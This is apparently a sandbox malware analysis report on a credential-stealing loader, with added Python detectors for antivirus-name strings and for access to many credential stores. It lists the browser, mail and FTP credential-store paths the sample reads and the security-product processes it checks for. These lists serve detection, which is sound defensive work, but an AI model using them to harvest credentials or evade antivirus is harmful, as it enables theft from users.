Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_029891C8 GetLocalTime,19_2_029891C8
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0298B748 GetVersionExA,19_2_0298B748
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
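The eight "Binary or memory string" rows above are the security-product process names (Comodo, Quick Heal, AVG, Trend Micro, Bitdefender, Defender) the loader keeps in memory to check what is running. The script below is an added example, not Joe Sandbox code and not the sample's own logic: it scans a memory dump for that list in both the narrow and the UTF-16LE form a Windows process can hold strings in, and renders the same check as a YARA rule. The dump fragment is constructed for the demonstration; the three-name threshold is an assumption chosen so that a single vendor name in an error message does not trigger.

```python
"""Added example (not Joe Sandbox code): scan a memory dump for the
security-product process names listed above, in both the byte encodings a
Windows process may hold them in, and emit an equivalent YARA rule."""

# Names taken from the "Binary or memory string" rows of this report.
AV_PROCESS_NAMES = [
    "cmdagent.exe", "quhlpsvc.exe", "avgamsvr.exe", "TMBMSRV.exe",
    "Vsserv.exe", "avgupsvc.exe", "avgemc.exe", "MsMpEng.exe",
]

ENCODINGS = ("ascii", "utf-16-le")   # narrow C strings vs. .NET / wide strings


def scan_for_names(buf, names=AV_PROCESS_NAMES):
    """Return {name: [(offset, encoding), ...]} for every case-insensitive hit.

    bytes.lower() only folds ASCII letters, so lower-casing both the haystack and
    the needle is safe for the NUL-interleaved UTF-16LE form as well.
    """
    hits = {}
    low = buf.lower()
    for name in names:
        for enc in ENCODINGS:
            needle = name.lower().encode(enc)
            pos = low.find(needle)
            while pos != -1:
                hits.setdefault(name, []).append((pos, enc))
                pos = low.find(needle, pos + 1)
    return hits


def looks_like_av_enumeration(hits, min_distinct=3):
    """One AV name is weak evidence (error strings mention them too); several
    distinct vendor names in one region is the tell. Threshold is an assumption."""
    return len(hits) >= min_distinct


def yara_rule(names=AV_PROCESS_NAMES, rule_name="av_process_enumeration", min_distinct=3):
    """Render the same logic as a YARA rule: 'ascii wide nocase' covers both
    encodings scanned above."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for i, name in enumerate(names):
        lines.append(f'        $av{i} = "{name}" ascii wide nocase')
    lines += ["    condition:", f"        {min_distinct} of ($av*)", "}"]
    return "\n".join(lines)


# Constructed dump fragment (not from the report): one narrow string, one wide
# string, one odd-cased string, and an unrelated process name that must not match.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"MsMpEng.exe\x00"
    + b"\x90" * 8
    + "Vsserv.exe".encode("utf-16-le")
    + b"\x00\x00"
    + b"avgemc.EXE"
    + b"notepad.exe\x00"
)

if __name__ == "__main__":
    found = scan_for_names(SAMPLE_DUMP)
    for name, where in found.items():
        print(name, where)
    print("AV enumeration:", looks_like_av_enumeration(found))
    print(yara_rule())
```

Run it against a real .sdmp file by replacing SAMPLE_DUMP with `open(path, "rb").read()`; the encoding column tells you whether the strings live in the Delphi/native stage or in a managed stage, which matters when you decide which dump to unpack.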

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
                    Source: Yara match | File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
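The "Key opened" / "File opened" rows above are one process reading the credential stores of browsers (Chrome, Edge, Firefox, Cyberfox, BlackHawk), mail clients (Thunderbird, Outlook's Windows Messaging Subsystem profiles, IncrediMail) and file-transfer tools (WinSCP sessions, FTP Navigator's Ftplist.txt) in one run. No legitimate application does that; each reads only its own store. The script below is an added example, not Joe Sandbox code: it scores a stream of file and registry access events and flags a process that reads several stores it does not own across more than one category. The store paths are the ones this report lists; the owning executable names, the event format and the thresholds are assumptions, and the events are constructed. Note that Sysmon does not record file reads or key opens, so this needs an EDR or ETW file/registry access feed.

```python
"""Added example (not Joe Sandbox code): flag a process that reads credential
stores belonging to several unrelated applications, the access pattern the
'Key opened' / 'File opened' rows above show for bwsiuvcU.pif."""
import re
from dataclasses import dataclass, field

# (category, executables assumed to legitimately own the store, pattern over the
# file path or registry key). Paths are the ones this report lists; the owner
# names are assumptions for the benign baseline, not from the report.
STORE_PATTERNS = [
    ("browser", {"chrome.exe"},
     re.compile(r"\\Google\\Chrome\\User Data\\.*\\Login Data$", re.I)),
    ("browser", {"msedge.exe"},
     re.compile(r"\\Microsoft\\Edge\\User Data\\.*\\Login Data$", re.I)),
    ("browser", {"firefox.exe"},
     re.compile(r"\\Mozilla\\Firefox\\profiles\.ini$", re.I)),
    ("browser", {"cyberfox.exe"},
     re.compile(r"\\8pecxstudios\\Cyberfox\\profiles\.ini$", re.I)),
    ("browser", {"blackhawk.exe"},
     re.compile(r"\\NETGATE Technologies\\BlackHawk\\profiles\.ini$", re.I)),
    ("mail", {"thunderbird.exe"},
     re.compile(r"\\Thunderbird\\profiles\.ini$", re.I)),
    ("mail", {"outlook.exe"},
     re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I)),
    ("mail", {"incmail.exe"},
     re.compile(r"\\IncrediMail\\Identities$", re.I)),
    ("ftp", {"winscp.exe"},
     re.compile(r"\\Martin Prikryl\\WinSCP 2\\Sessions$", re.I)),
    ("ftp", {"ftpnavigator.exe"},
     re.compile(r"\\FTP Navigator\\Ftplist\.txt$", re.I)),
]


@dataclass
class ProcessVerdict:
    image: str
    stores: set = field(default_factory=set)      # distinct stores touched
    categories: set = field(default_factory=set)  # browser / mail / ftp
    foreign: int = 0                               # stores this image does not own


def classify_target(target):
    """Map a path or registry key to (category, owners, store id), or None."""
    for category, owners, rx in STORE_PATTERNS:
        if rx.search(target):
            return category, owners, rx.pattern
    return None


def score_events(events, min_foreign=3, min_categories=2):
    """events: iterable of {'pid', 'image', 'target'} from a file/registry
    access feed (assumed format). Returns {pid: ProcessVerdict} for processes
    that read at least min_foreign stores they do not own, spanning at least
    min_categories categories. Thresholds are an assumption."""
    per_pid = {}
    for ev in events:
        hit = classify_target(ev["target"])
        if hit is None:
            continue
        category, owners, store = hit
        v = per_pid.setdefault(ev["pid"], ProcessVerdict(ev["image"]))
        if store in v.stores:
            continue                     # re-reads of the same store add nothing
        v.stores.add(store)
        v.categories.add(category)
        if ev["image"].lower() not in owners:
            v.foreign += 1
    return {pid: v for pid, v in per_pid.items()
            if v.foreign >= min_foreign and len(v.categories) >= min_categories}


# Constructed events: the stealer's accesses from this report, plus a benign
# baseline of applications reading only their own store.
SAMPLE_EVENTS = [
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"pid": 6340, "image": "bwsiuvcU.pif", "target": r"C:\FTP Navigator\Ftplist.txt"},
    {"pid": 4100, "image": "firefox.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 4100, "image": "firefox.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default\logins.json"},
    {"pid": 5200, "image": "chrome.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for pid, v in score_events(SAMPLE_EVENTS).items():
        print(f"pid {pid} {v.image}: {v.foreign} foreign stores, categories {sorted(v.categories)}")
```

The foreign-store count is what separates a stealer from a backup agent or a sync client: those also read many files, but they are rarely on an allow-list of credential-store owners and you would add them explicitly rather than relax the threshold.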
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
